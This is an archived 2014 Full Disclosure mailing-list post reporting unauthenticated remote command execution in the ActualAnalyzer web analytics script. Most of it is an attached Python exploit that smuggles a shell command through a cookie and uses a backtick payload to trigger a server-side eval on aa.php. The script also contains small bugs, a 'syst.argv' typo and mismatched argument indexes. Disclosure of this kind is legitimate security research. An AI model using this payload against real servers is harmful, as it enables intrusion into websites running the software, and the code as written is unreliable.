[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Actual Analyzer Unauthenticated Command Execution
From: "Benjamin Harris" <bch () hush ! ai>
Date: 2014-08-27 23:21:26
Message-ID: 20140827232126.D280BC00FD () smtp ! hushmail ! com
[Download RAW message or body]
Hi All
URL: http://www.actualscripts.com/products/analyzer/
I tried to report this a month ago, but got no response from the
developers via the support form on their website, requesting a GPG
key. This is an old vulnerability I found while dusting off some
old hard drives.
Latest still vulnerable.
Brief:
-------------------------
The most popular web statistics tools delivers one big flat list
with statistics for any website. It is very easy in use but for
websites with small amount of pages only. Besides are provided the
primary opportunities for analyses of web site statistics only.
Details:
--------------------------
We control limited characters of an eval. Load commands into unused
variable and use backticks to execute command in short space.
Attached is a POC.
Pre-reqs are that you must know the domain of a website being
tracked by this script.
Many thanks,
Ben
["release.py" (text/x-python)]
###############################
# ActualAnalyzer exploit.
# Tested on Lite version
# We load command into a dummy variable as we only have 6 characters to own the eval
# but load more as first 2 characters get rm'd.
# We then execute the eval with backticks.
# 11/05/2011
##############################
import urllib
import urllib2
import sys
import time
def banner():
print " ____ __ __ __ "
print " / __/_ ______ _ ____ ______/ /___ ______ _/ /___ _____ ____ _/ /_ ______ ___ _____"
print " / /_/ / / / __ `// __ `/ ___/ __/ / / / __ `/ / __ `/ __ \/ __ `/ / / / /_ / / _ \/ ___/"
print " / __/ /_/ / /_/ // /_/ / /__/ /_/ /_/ / /_/ / / /_/ / / / / /_/ / / /_/ / / /_/ __/ / "
print " /_/ \__,_/\__, (_)__,_/\___/\__/\__,_/\__,_/_/\__,_/_/ /_/\__,_/_/\__, / /___/\___/_/ "
print " /_/ /____/ "
def usage():
print " [+] Usage:"
print " [-] python " + sys.argv[0] + " -h vulnHOST -d analyticdomain -c \"command\""
print " [-] python fuq.actualanalyzer.py -h test.com/lite -d analyticdomain -c \"touch /tmp/123\""
banner()
if len(sys.argv) < 6:
usage()
quit()
domain = sys.argv[2]
command = sys.argv[6]
host = syst.argv[4]
def commandexploit(domain,host,command):
url = 'http://' + domain + '/aa.php?anp=' + host
data = None
headers = {'Cookie': "ant=" + command + "; anm=414.`$cot`"}
exploit1 = urllib2.Request(url,data,headers)
exploit2 = urllib2.urlopen(exploit1)
commandexploit(domain,host,command)
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic